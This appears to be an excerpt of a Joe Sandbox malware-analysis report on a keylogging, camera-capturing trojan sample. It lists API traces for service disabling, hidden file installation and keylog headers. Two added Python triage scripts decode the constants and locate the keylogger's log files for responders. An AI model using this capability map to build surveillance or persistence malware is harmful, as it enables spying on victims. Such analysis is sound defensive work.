                                                                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prologSleep
                                                                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                          • API String ID: 3469354165-3054508432
                                                                                          • Opcode ID: 4e7d72cfb869cbd4a3cca5645b8252f5b7393d96b6abf356dbd6ddaa2dec30c4
                                                                                          • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                          • Opcode Fuzzy Hash: 4e7d72cfb869cbd4a3cca5645b8252f5b7393d96b6abf356dbd6ddaa2dec30c4
                                                                                          • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                          APIs
                                                                                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                          • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3950776272-0
                                                                                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                           Joe Sandbox IDA Plugin
                                                                                           • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          • API ID: __cftoe
                                                                                          • String ID:
                                                                                          • API String ID: 4189289331-0
                                                                                          • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                          • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                           Joe Sandbox IDA Plugin
                                                                                           • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                          • String ID:
                                                                                          • API String ID: 3795512280-0
                                                                                          • Opcode ID: 878f6ea5af70e8d299457992e433038a7ecef4d13d6e9d58e6633a4d30a966b5
                                                                                          • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                          • Opcode Fuzzy Hash: 878f6ea5af70e8d299457992e433038a7ecef4d13d6e9d58e6633a4d30a966b5
                                                                                          • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                           Joe Sandbox IDA Plugin
                                                                                           • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                          • String ID:
                                                                                          • API String ID: 493672254-0
                                                                                          • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                          • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                          • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                          • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                          • _free.LIBCMT ref: 004482CC
                                                                                          • _free.LIBCMT ref: 004482F4
                                                                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                          • _abort.LIBCMT ref: 00448313
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                           Joe Sandbox IDA Plugin
                                                                                           • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 3160817290-0
                                                                                          • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                          • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                          • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                          • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                           Joe Sandbox IDA Plugin
                                                                                           • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                          • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                           Joe Sandbox IDA Plugin
                                                                                           • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                          • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                           Joe Sandbox IDA Plugin
                                                                                           • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                          • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
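The four service-control functions above (ChangeServiceConfigW with dwStartType 4 after OpenServiceW with access 0x2, and ControlService with dwControl 1, 2 and 3 after OpenServiceW with access 0x20 or 0x40) and the install routine earlier on this page that calls SetFileAttributesW with 0x80 and later with 0x06 are easier to read once the raw argument columns are decoded. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses API lines in the report's own `Name.MODULE(args), ref: addr` layout, decodes the constants from the documented Win32 prototypes, and tags the behaviours a responder cares about (a service being set to SERVICE_DISABLED, a service being stopped, a file being marked hidden and system). The sample trace is copied from the entries on this page. The decoder only interprets columns that correspond to real parameters of the named API, because the sandbox prints additional stack slots after them, and it leaves values it cannot name, such as the 000000FF service-type column, as raw hex rather than guessing.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: API lines copied from the service-control and
# install-routine entries of this report (not a live trace).
SAMPLE_TRACE = """\
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
• _free.LIBCMT ref: 004482CC
"""

# One report line: optional "Part of subcall function XXXXXXXX: ", then
# Name.MODULE(arg,arg,...) or Name.MODULE with no argument list, then "ref: addr".
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})"
)

# Constants from the Win32 documentation for the parameters decoded below.
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
START_TYPE = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
              3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED", 0xFFFFFFFF: "SERVICE_NO_CHANGE"}
SERVICE_ACCESS = {0x1: "SERVICE_QUERY_CONFIG", 0x2: "SERVICE_CHANGE_CONFIG", 0x4: "SERVICE_QUERY_STATUS",
                  0x8: "SERVICE_ENUMERATE_DEPENDENTS", 0x10: "SERVICE_START", 0x20: "SERVICE_STOP",
                  0x40: "SERVICE_PAUSE_CONTINUE", 0x80: "SERVICE_INTERROGATE", 0x100: "SERVICE_USER_DEFINED_CONTROL"}
FILE_ATTR = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN", 0x4: "FILE_ATTRIBUTE_SYSTEM",
             0x20: "FILE_ATTRIBUTE_ARCHIVE", 0x80: "FILE_ATTRIBUTE_NORMAL"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # int per hex column, None where the report shows '?'
    ref: str
    subcall: Optional[str] = None

def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [None if a == "?" else int(a, 16) for a in raw.split(",")]
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls

def flag_names(value: int, table: dict) -> str:
    """Expand a bit mask into names; bits the table does not know stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(f"0x{unknown:X}")
    return "|".join(names) if names else f"0x{value:X}"

def decode(call: ApiCall) -> Optional[str]:
    """Name the parameter that matters for each API. Only positions that are real
    parameters of the prototype are read; the trailing columns are stack noise."""
    a = call.args
    def arg(i):
        return a[i] if i < len(a) else None
    if call.api == "ControlService" and arg(1) is not None:
        return "dwControl=" + SERVICE_CONTROL.get(arg(1), f"0x{arg(1):X}")
    if call.api == "ChangeServiceConfigW" and arg(2) is not None:
        return "dwStartType=" + START_TYPE.get(arg(2), f"0x{arg(2):X}")
    if call.api == "OpenServiceW" and arg(2) is not None:
        return "dwDesiredAccess=" + flag_names(arg(2), SERVICE_ACCESS)
    if call.api == "SetFileAttributesW" and arg(1) is not None:
        return "dwFileAttributes=" + flag_names(arg(1), FILE_ATTR)
    if call.api == "Sleep" and arg(0) is not None:
        return f"dwMilliseconds={arg(0)} ({arg(0) / 1000:g} s)"
    return None

def triage(text: str) -> dict:
    """Decode every recognised call and tag the behaviours worth escalating."""
    findings, tags = [], set()
    for call in parse_trace(text):
        meaning = decode(call)
        if meaning is None:
            continue
        findings.append((call.ref, call.api, meaning))
        if call.api == "ChangeServiceConfigW" and call.args[2] == 4:
            tags.add("service_disable")
        if call.api == "ControlService" and call.args[1] == 1:
            tags.add("service_stop")
        if call.api == "SetFileAttributesW" and (call.args[1] & 0x6) == 0x6:
            tags.add("hide_file")
    return {"findings": findings, "tags": sorted(tags)}

if __name__ == "__main__":
    result = triage(SAMPLE_TRACE)
    for ref, api, meaning in result["findings"]:
        print(f"{ref}  {api:<22} {meaning}")
    print("tags:", ", ".join(result["tags"]))
```

Run as-is it prints one decoded line per recognised call from the constructed trace and the tags `hide_file, service_disable, service_stop`; point `triage()` at lines copied from another function entry to decode those instead. Access masks and control codes are expanded from tables so that a new constant (for example SERVICE_CONTROL_INTERROGATE) is one dictionary entry away, and unknown bits are never silently dropped.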
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                           Joe Sandbox IDA Plugin
                                                                                           • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          • API ID: _free
                                                                                          • String ID: @^E
                                                                                          • API String ID: 269201875-2908066071
                                                                                          • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                          • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                          • ExitThread.KERNEL32 ref: 004018F6
                                                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                           Joe Sandbox IDA Plugin
                                                                                           • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                          • String ID: PkG$NG
                                                                                          • API String ID: 1649129571-2686071003
                                                                                          • Opcode ID: de5d16925772a287ebcfb4afa4ce91567f336408c558c247237889d51a2cceb0
                                                                                          • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                          • Opcode Fuzzy Hash: de5d16925772a287ebcfb4afa4ce91567f336408c558c247237889d51a2cceb0
                                                                                          • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                          • wsprintfW.USER32 ref: 0040B22E
                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                           Joe Sandbox IDA Plugin
                                                                                           • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          • API ID: EventLocalTimewsprintf
                                                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                          • API String ID: 1497725170-248792730
                                                                                          • Opcode ID: 7b20d03c37d9a1a3baa0d8ae1900ee4e121debabd9ed06dd085a81a1a50f0536
                                                                                          • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                          • Opcode Fuzzy Hash: 7b20d03c37d9a1a3baa0d8ae1900ee4e121debabd9ed06dd085a81a1a50f0536
                                                                                          • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
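The wsprintfW format string "[%04i/%02i/%02i %02i:%02i:%02i " together with the "Offline Keylogger Started" marker in the function above gives a file-level signature for the offline keylog this sample writes, which is what an incident responder will want to locate and split into sessions on a compromised host. The Python below is an added example, not code from the report or from the sample. Its assumptions: the header is assembled as timestamp, marker and closing bracket on one line (the page shows the three strings but not how they are joined, so the regex pins only the timestamp fields and the bracketed marker), and the log may be stored either as UTF-16LE, which is what wsprintfW produces, or as narrow text, so both decodings are tried and the one that yields headers wins. Because the time comes from GetLocalTime, every timestamp is the victim machine's local time, not UTC, and must be converted before it is placed on a timeline. The sample log content is constructed.

```python
import re
import sys
from datetime import datetime

# Format string and marker seen in the function above. The joined layout
# "[YYYY/MM/DD hh:mm:ss Offline Keylogger Started]" is an assumption.
HEADER_RE = re.compile(
    r"\[(?P<y>\d{4})/(?P<mo>\d{2})/(?P<d>\d{2}) "
    r"(?P<h>\d{2}):(?P<mi>\d{2}):(?P<s>\d{2}) (?P<marker>[^\]\r\n]*)\]"
)
MARKER = "Offline Keylogger Started"

# Constructed sample log (not a real capture). The third header carries an
# impossible date and must be rejected rather than crash the scanner.
SAMPLE_LOG_TEXT = (
    "[2024/11/04 09:15:02 Offline Keylogger Started]\r\n"
    "user typed here\r\n"
    "[2024/11/04 17:40:31 Offline Keylogger Started]\r\n"
    "more keystrokes\r\n"
    "[2024/13/40 00:00:00 Offline Keylogger Started]\r\n"
)
SAMPLE_LOG_UTF16 = SAMPLE_LOG_TEXT.encode("utf-16-le")

def sessions_in_text(text: str) -> list:
    """One dict per valid session header: local timestamp (GetLocalTime, so the
    victim's zone), character offset, and the logged text up to the next header."""
    headers = [m for m in HEADER_RE.finditer(text)
               if m.group("marker").strip() == MARKER]
    found = []
    for i, m in enumerate(headers):
        try:
            ts = datetime(int(m.group("y")), int(m.group("mo")), int(m.group("d")),
                          int(m.group("h")), int(m.group("mi")), int(m.group("s")))
        except ValueError:
            continue  # malformed or forged header: skip, but keep scanning
        end = headers[i + 1].start() if i + 1 < len(headers) else len(text)
        found.append({"local_time": ts, "offset": m.start(), "body": text[m.end():end]})
    return found

def find_sessions(data: bytes) -> list:
    """Try UTF-16LE first (wsprintfW writes wide strings), then UTF-8, and keep
    whichever decoding yields the most session headers."""
    best, best_enc = [], None
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = data.decode(enc)
        except UnicodeDecodeError:
            continue
        hits = sessions_in_text(text)
        if len(hits) > len(best):
            best, best_enc = hits, enc
    for hit in best:
        hit["encoding"] = best_enc
    return best

if __name__ == "__main__":
    blobs = [open(p, "rb").read() for p in sys.argv[1:]] or [SAMPLE_LOG_UTF16]
    for blob in blobs:
        for s in find_sessions(blob):
            print(f"{s['local_time']:%Y-%m-%d %H:%M:%S} local ({s['encoding']}) "
                  f"@{s['offset']}: {len(s['body'].strip())} chars logged")
```

Run with one or more file paths to scan real files, or with no arguments to scan the constructed sample. The marker comparison is exact, so a header whose text differs (a renamed build, a different Remcos version) is reported as no match rather than as a false session; relax `MARKER` deliberately if you need to hunt for variants.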
                                                                                          APIs
                                                                                          • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                          • GetLastError.KERNEL32 ref: 0041D611
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
